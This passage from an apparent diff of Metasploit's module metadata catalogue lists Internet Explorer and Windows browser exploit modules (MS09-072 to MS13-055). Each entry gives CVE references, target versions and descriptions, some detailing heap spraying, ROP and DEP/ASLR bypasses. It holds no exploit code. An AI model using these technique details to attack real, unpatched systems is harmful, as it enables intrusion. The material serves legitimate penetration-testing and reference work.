"platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms09_072_style_object.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms09_072_style_object", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_002_aurora": { - "name": "MS10-002 Microsoft Internet Explorer \"Aurora\" Memory Corruption", - "fullname": "exploit/windows/browser/ms10_002_aurora", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-01-14", - "type": "exploit", - "author": [ - "unknown", - "hdm " - ], - "description": "This module exploits a memory corruption flaw in Internet Explorer. This\n flaw was found in the wild and was a key component of the \"Operation Aurora\"\n attacks that lead to the compromise of a number of high profile companies. The\n exploit code is a direct port of the public sample published to the Wepawet\n malware analysis site. 
The technique used by this module is currently identical\n to the public sample, as such, only Internet Explorer 6 can be reliably exploited.", - "references": [ - "MSB-MS10-002", - "CVE-2010-0249", - "OSVDB-61697", - "URL-https://web.archive.org/web/20100609073233/http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_002_aurora.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_002_aurora", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_002_ie_object": { - "name": "MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free", - "fullname": "exploit/windows/browser/ms10_002_ie_object", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-01-21", - "type": "exploit", - "author": [ - "Peter Vreugdenhil", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Internet Explorer's\n mshtml component. Due to the way IE handles objects in memory, it is\n possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext\n to be used even after it gets freed, therefore allowing remote code\n execution under the context of the user.\n\n This particular vulnerability was also one of 2012's Pwn2Own\n challenges, and was later explained by Peter Vreugdenhil with exploitation\n details. 
Instead of Peter's method, this module uses heap spraying like\n the 99% to store a specially crafted memory layout before re-using the\n freed memory.", - "references": [ - "MSB-MS10-002", - "CVE-2010-0248", - "OSVDB-61914", - "URL-http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup", - "ZDI-10-014" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 8 on Windows XP SP3", - "IE 8 on Windows 7 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_002_ie_object.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_002_ie_object", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_018_ie_behaviors": { - "name": "MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free", - "fullname": "exploit/windows/browser/ms10_018_ie_behaviors", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-03-09", - "type": "exploit", - "author": [ - "unknown", - "Trancer ", - "Nanika", - "jduck " - ], - "description": "This module exploits a use-after-free vulnerability within the DHTML behaviors\n functionality of Microsoft Internet Explorer versions 6 and 7. This bug was\n discovered being used in-the-wild and was previously known as the \"iepeers\"\n vulnerability. The name comes from Microsoft's suggested workaround to block\n access to the iepeers.dll file.\n\n According to Nico Waisman, \"The bug itself is when trying to persist an object\n using the setAttribute, which end up calling VariantChangeTypeEx with both the\n source and the destination being the same variant. So if you send as a variant\n an IDISPATCH the algorithm will try to do a VariantClear of the destination before\n using it. 
This will end up on a call to PlainRelease which deref the reference\n and clean the object.\"\n\n NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.", - "references": [ - "CVE-2010-0806", - "OSVDB-62810", - "BID-38615", - "URL-https://web.archive.org/web/20100929225343/http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/", - "URL-https://web.archive.org/web/20120627174253/http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html", - "MSB-MS10-018" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista", - "IE 6 SP0-SP2 (onclick)", - "IE 7.0 (marquee)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_018_ie_behaviors", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_018_ie_tabular_activex": { - "name": "MS10-018 Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption", - "fullname": "exploit/windows/browser/ms10_018_ie_tabular_activex", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-03-09", - "type": "exploit", - "author": [ - "Unknown", - "jduck " - ], - "description": "This module exploits a memory corruption vulnerability in the Internet Explorer\n Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet\n Explorer are vulnerable.\n\n By specifying a long value as the \"DataURL\" parameter to this control, it is possible\n to write a NUL byte outside the bounds of an array. 
By targeting control flow data\n on the stack, an attacker can execute arbitrary code.", - "references": [ - "CVE-2010-0805", - "OSVDB-63329", - "BID-39025", - "ZDI-10-034", - "MSB-MS10-018" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic (Heap Spray)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_018_ie_tabular_activex", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_022_ie_vbscript_winhlp32": { - "name": "MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution", - "fullname": "exploit/windows/browser/ms10_022_ie_vbscript_winhlp32", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-02-26", - "type": "exploit", - "author": [ - "Maurycy Prodeus", - "jduck " - ], - "description": "This module exploits a code execution vulnerability that occurs when a user\n presses F1 on MessageBox originated from VBscript within a web page. When the\n user hits F1, the MessageBox help functionality will attempt to load and use\n a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server.\n\n This particular version of the exploit implements a WebDAV server that will\n serve HLP file as well as a payload EXE. During testing warnings about the\n payload EXE being unsigned were witnessed. 
A future version of this module\n might use other methods that do not create such a warning.", - "references": [ - "CVE-2010-0483", - "OSVDB-62632", - "MSB-MS10-022", - "URL-https://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx", - "URL-https://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer on Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_022_ie_vbscript_winhlp32", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_026_avi_nsamplespersec": { - "name": "MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow", - "fullname": "exploit/windows/browser/ms10_026_avi_nsamplespersec", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-04-13", - "type": "exploit", - "author": [ - "Yamata Li", - "Shahin Ramezany ", - "juan vazquez ", - "Jordi Sanchez " - ], - "description": "This module exploits a buffer overflow in l3codecx.ax while processing a\n AVI files with MPEG Layer-3 audio contents. 
The overflow only allows to overwrite\n with 0's so the three least significant bytes of EIP saved on stack are\n overwritten and shellcode is mapped using the .NET DLL memory technique pioneered\n by Alexander Sotirov and Mark Dowd.\n\n Please note on IE 8 targets, your malicious URL must be a trusted site in order\n to load the .Net control.", - "references": [ - "CVE-2010-0480", - "OSVDB-63749", - "BID-39303", - "MSB-MS10-026", - "URL-http://web.archive.org/web/20110916145030/http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/", - "URL-http://www.phreedom.org/research/bypassing-browser-memory-protections/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 Automatic" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_026_avi_nsamplespersec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_042_helpctr_xss_cmd_exec": { - "name": "Microsoft Help Center XSS and Command Execution", - "fullname": "exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-06-09", - "type": "exploit", - "author": [ - "Tavis Ormandy", - "natron " - ], - "description": "Help and Support Center is the default application provided to access online\n documentation for Microsoft Windows. Microsoft supports accessing help documents\n directly via URLs by installing a protocol handler for the scheme \"hcp\". 
Due to\n an error in validation of input to hcp:// combined with a local cross site\n scripting vulnerability and a specialized mechanism to launch the XSS trigger,\n arbitrary command execution can be achieved.\n\n On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it\n can be used to launch the exploit automatically. If IE8 and WMP11, either can\n be used to launch the attack, but both pop dialog boxes asking the user if\n execution should continue. This exploit detects if non-intrusive mechanisms are\n available and will use one if possible. In the case of both IE8 and WMP11, the\n exploit defaults to using an iframe on IE8, but is configurable by setting the\n DIALOGMECH option to \"none\" or \"player\".\n\n This module creates a WebDAV service from which the payload is copied to the\n victim machine.", - "references": [ - "CVE-2010-1885", - "OSVDB-65264", - "MSB-MS10-042" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-30 10:56:41 +0000", - "path": "/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_042_helpctr_xss_cmd_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_046_shortcut_icon_dllloader": { - "name": "Microsoft Windows Shell LNK Code Execution", - "fullname": "exploit/windows/browser/ms10_046_shortcut_icon_dllloader", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-07-16", - "type": "exploit", - "author": [ - "hdm ", - "jduck ", - "B_H" - ], - "description": "This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. 
This module creates a WebDAV service that can be used\n to run an arbitrary payload when accessed as a UNC path.", - "references": [ - "CVE-2010-2568", - "OSVDB-66387", - "MSB-MS10-046" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_046_shortcut_icon_dllloader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_090_ie_css_clip": { - "name": "MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption", - "fullname": "exploit/windows/browser/ms10_090_ie_css_clip", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-11-03", - "type": "exploit", - "author": [ - "unknown", - "Yuange", - "Matteo Memelli", - "jduck " - ], - "description": "This module exploits a memory corruption vulnerability within Microsoft's\n HTML engine (mshtml). When parsing an HTML page containing a specially\n crafted CSS tag, memory corruption occurs that can lead arbitrary code\n execution.\n\n It seems like Microsoft code inadvertently increments a vtable pointer to\n point to an unaligned address within the vtable's function pointers. This\n leads to the program counter being set to the address determined by the\n address \"[vtable+0x30+1]\". The particular address depends on the exact\n version of the mshtml library in use.\n\n Since the address depends on the version of mshtml, some versions may not\n be exploitable. 
Specifically, those ending up with a program counter value\n within another module, in kernel space, or just not able to be reached with\n various memory spraying techniques.\n\n Also, since the address is not controllable, it is unlikely to be possible\n to use ROP to bypass non-executable memory protections.", - "references": [ - "CVE-2010-3962", - "OSVDB-68987", - "BID-44536", - "EDB-15421", - "MSB-MS10-090" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Debug", - "Internet Explorer 6", - "Internet Explorer 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_090_ie_css_clip", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms11_003_ie_css_import": { - "name": "MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free", - "fullname": "exploit/windows/browser/ms11_003_ie_css_import", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-11-29", - "type": "exploit", - "author": [ - "passerby", - "d0c_s4vage", - "jduck " - ], - "description": "This module exploits a memory corruption vulnerability within Microsoft\\'s\n HTML engine (mshtml). When parsing an HTML page containing a recursive CSS\n import, a C++ object is deleted and later reused. This leads to arbitrary\n code execution.\n\n This exploit utilizes a combination of heap spraying and the\n .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. 
As such, this module should be reliable on all Windows\n versions with .NET 2.0.50727 installed.", - "references": [ - "CVE-2010-3971", - "OSVDB-69796", - "BID-45246", - "URL-http://www.wooyun.org/bugs/wooyun-2010-0885", - "URL-https://seclists.org/fulldisclosure/2010/Dec/110", - "MSB-MS11-003" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer 8", - "Internet Explorer 7", - "Internet Explorer 6", - "Debug Target (Crash)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms11_003_ie_css_import.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms11_003_ie_css_import", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms11_050_mshtml_cobjectelement": { - "name": "MS11-050 IE mshtml!CObjectElement Use After Free", - "fullname": "exploit/windows/browser/ms11_050_mshtml_cobjectelement", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-06-16", - "type": "exploit", - "author": [ - "d0c_s4vage", - "sinn3r ", - "bannedit " - ], - "description": "This module exploits a use-after-free vulnerability in Internet Explorer. The\n vulnerability occurs when an invalid tag exists and other elements\n overlap/cover where the object tag should be when rendered (due to their\n styles/positioning). The mshtml!CObjectElement is then freed from memory because\n it is invalid. 
However, the mshtml!CDisplay object for the page continues to keep\n a reference to the freed and attempts to call a function on it, leading\n to the use-after-free.\n\n Please note that for IE 8 targets, JRE (Java Runtime Environment) is required\n to bypass DEP (Data Execution Prevention).", - "references": [ - "CVE-2011-1260", - "OSVDB-72950", - "MSB-MS11-050", - "URL-http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer 7 on XP SP3", - "Internet Explorer 7 on Windows Vista", - "Internet Explorer 8 on XP SP3", - "Internet Explorer 8 on Windows 7", - "Debug Target (Crash)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms11_050_mshtml_cobjectelement", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms11_081_option": { - "name": "MS11-081 Microsoft Internet Explorer Option Element Use-After-Free", - "fullname": "exploit/windows/browser/ms11_081_option", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-10-11", - "type": "exploit", - "author": [ - "Ivan Fratric", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a vulnerability in Microsoft Internet Explorer. 
A memory\n corruption may occur when the Option cache isn't updated properly, which allows\n other JavaScript methods to access a deleted Option element, and results in code\n execution under the context of the user.", - "references": [ - "CVE-2011-1996", - "OSVDB-76208", - "MSB-MS11-081", - "URL-http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html", - "URL-http://pastebin.com/YLH725Aj" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 8 on Windows XP SP3", - "IE 8 on Windows Vista", - "IE 8 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms11_081_option.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms11_081_option", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms11_093_ole32": { - "name": "MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution", - "fullname": "exploit/windows/browser/ms11_093_ole32", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-12-13", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a type confusion vulnerability in the OLE32 component of\n Windows XP SP3. 
The vulnerability exists in the CPropertyStorage::ReadMultiple\n function.\n\n A Visio document with a specially crafted Summary Information Stream embedded allows\n to get remote code execution through Internet Explorer, on systems with Visio Viewer\n installed.", - "references": [ - "MSB-MS11-093", - "CVE-2011-3400", - "OSVDB-77663", - "BID-50977", - "URL-http://aluigi.org/adv/ole32_1-adv.txt", - "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=966" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3 / Visio Viewer 2010", - "IE 7 on Windows XP SP3 / Visio Viewer 2010" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms11_093_ole32.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms11_093_ole32", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms12_004_midi": { - "name": "MS12-004 midiOutPlayNextPolyEvent Heap Overflow", - "fullname": "exploit/windows/browser/ms12_004_midi", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-10", - "type": "exploit", - "author": [ - "Shane Garrett", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a heap overflow vulnerability in the Windows Multimedia\n Library (winmm.dll). The vulnerability occurs when parsing specially crafted\n MIDI files. 
Remote code execution can be achieved by using the Windows Media Player\n ActiveX control.\n\n Exploitation is done by supplying a specially crafted MIDI file with\n specific events, causing the offset calculation being higher than what is\n available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing\n us to either \"inc al\" or \"dec al\" a byte. This can be used to corrupt an array\n (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects,\n which leverages remote code execution under the context of the user.\n\n Note: At this time, for IE 8 target, msvcrt ROP is used by default. However,\n if you know your target's patch level, you may also try the 'MSHTML' advanced\n option for an info leak based attack. Currently, this module only supports two\n MSHTML builds: 8.0.6001.18702, which is often seen in a newly installed XP SP3.\n Or 8.0.6001.19120, which is patch level before the MS12-004 fix.\n\n Also, based on our testing, the vulnerability does not seem to trigger when\n the victim machine is operated via rdesktop.", - "references": [ - "MSB-MS12-004", - "CVE-2012-0003", - "OSVDB-78210", - "BID-51292" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms12_004_midi.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms12_004_midi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms12_037_ie_colspan": { - "name": "MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", - "fullname": "exploit/windows/browser/ms12_037_ie_colspan", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-12", - "type": 
"exploit", - "author": [ - "Alexandre Pelletier", - "mr_me ", - "binjo", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a heap overflow vulnerability in Internet Explorer caused\n by an incorrect handling of the span attribute for col elements from a fixed table,\n when they are modified dynamically by javascript code.", - "references": [ - "CVE-2012-1876", - "OSVDB-82866", - "BID-53848", - "MSB-MS12-037" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 8 on Windows XP SP3 with msvcrt ROP", - "IE 8 on Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms12_037_ie_colspan.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms12_037_ie_colspan", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms12_037_same_id": { - "name": "MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption", - "fullname": "exploit/windows/browser/ms12_037_same_id", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-12", - "type": "exploit", - "author": [ - "Dark Son", - "Unknown", - "Yichong Lin", - "juan vazquez " - ], - "description": "This module exploits a memory corruption flaw in Internet Explorer 8 when\n handling objects with the same ID property. At the moment this module targets\n IE8 over Windows XP SP3 and Windows 7. 
This module supports heap massaging\n as well as the heap spray method seen in the wild (Java msvcrt71.dll).", - "references": [ - "MSB-MS12-037", - "CVE-2012-1875", - "OSVDB-82865", - "URL-http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/", - "URL-https://twitter.com/binjo/status/212795802974830592", - "URL-https://www.rapid7.com/blog/post/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 8 on Windows XP SP3 with msvcrt ROP", - "IE 8 on Windows XP SP3 with JRE ROP", - "IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/browser/ms12_037_same_id.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms12_037_same_id", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_009_ie_slayoutrun_uaf": { - "name": "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free", - "fullname": "exploit/windows/browser/ms13_009_ie_slayoutrun_uaf", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-02-13", - "type": "exploit", - "author": [ - "Scott Bell " - ], - "description": "This module exploits a use-after-free vulnerability in Microsoft Internet Explorer\n where a CParaElement node is released but a reference is still kept\n in CDoc. 
This memory is reused when a CDoc relayout is performed.", - "references": [ - "CVE-2013-0025", - "OSVDB-90122", - "MSB-MS13-009", - "URL-http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 8 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_009_ie_slayoutrun_uaf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_022_silverlight_script_object": { - "name": "MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access", - "fullname": "exploit/windows/browser/ms13_022_silverlight_script_object", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-03-12", - "type": "exploit", - "author": [ - "James Forshaw", - "Vitaliy Toropov", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\n from System.Windows.dll. 
This module has been tested successfully on IE6 - IE10, Windows XP\n SP3 / Windows 7 SP1.", - "references": [ - "CVE-2013-0074", - "CVE-2013-3896", - "OSVDB-91147", - "OSVDB-98223", - "BID-58327", - "BID-62793", - "MSB-MS13-022", - "MSB-MS13-087", - "PACKETSTORM-123731" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86/x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_022_silverlight_script_object", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_037_svg_dashstyle": { - "name": "MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow", - "fullname": "exploit/windows/browser/ms13_037_svg_dashstyle", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-03-06", - "type": "exploit", - "author": [ - "Nicolas Joly", - "4B5F5F4B", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits an integer overflow vulnerability on Internet Explorer.\n The vulnerability exists in the handling of the dashstyle.array length for vml\n shapes on the vgx.dll module.\n\n The exploit has been built and tested specifically against Windows 7 SP1 with\n Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to\n bypass ASLR, and by default the info leak is used. To make sure the leak is\n successful, the ntdll version should be either v6.1.7601.17514 (the default dll\n version on a newly installed/unpatched Windows 7 SP1), or ntdll.dll v6.1.7601.17725\n (installed after apply MS12-001). 
If the target doesn't have the version the exploit\n wants, it will refuse to attack by sending a fake 404 message (webpage not found).\n\n If you wish to try the JRE6 component instead to bypass ASLR, you can set the\n advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't\n have this particular component, the exploit will also refuse to attack by\n sending a 404 message.", - "references": [ - "CVE-2013-2551", - "OSVDB-91197", - "BID-58570", - "MSB-MS13-037", - "URL-http://binvul.com/viewthread.php?tid=311" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IE 8 on Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_037_svg_dashstyle", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_055_canchor": { - "name": "MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free", - "fullname": "exploit/windows/browser/ms13_055_canchor", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-07-09", - "type": "exploit", - "author": [ - "Jose Antonio Vazquez Gonzalez", - "Orange Tsai", - "Peter Vreugdenhil", - "sinn3r " - ], - "description": "In IE8 standards mode, it's possible to cause a use-after-free condition by first\n creating an illogical table tree, where a CPhraseElement comes after CTableRow,\n with the final node being a sub table element. When the CPhraseElement's outer\n content is reset by using either outerText or outerHTML through an event handler,\n this triggers a free of its child element (in this case, a CAnchorElement, but\n some other objects apply too), but a reference is still kept in function\n SRunPointer::SpanQualifier. 
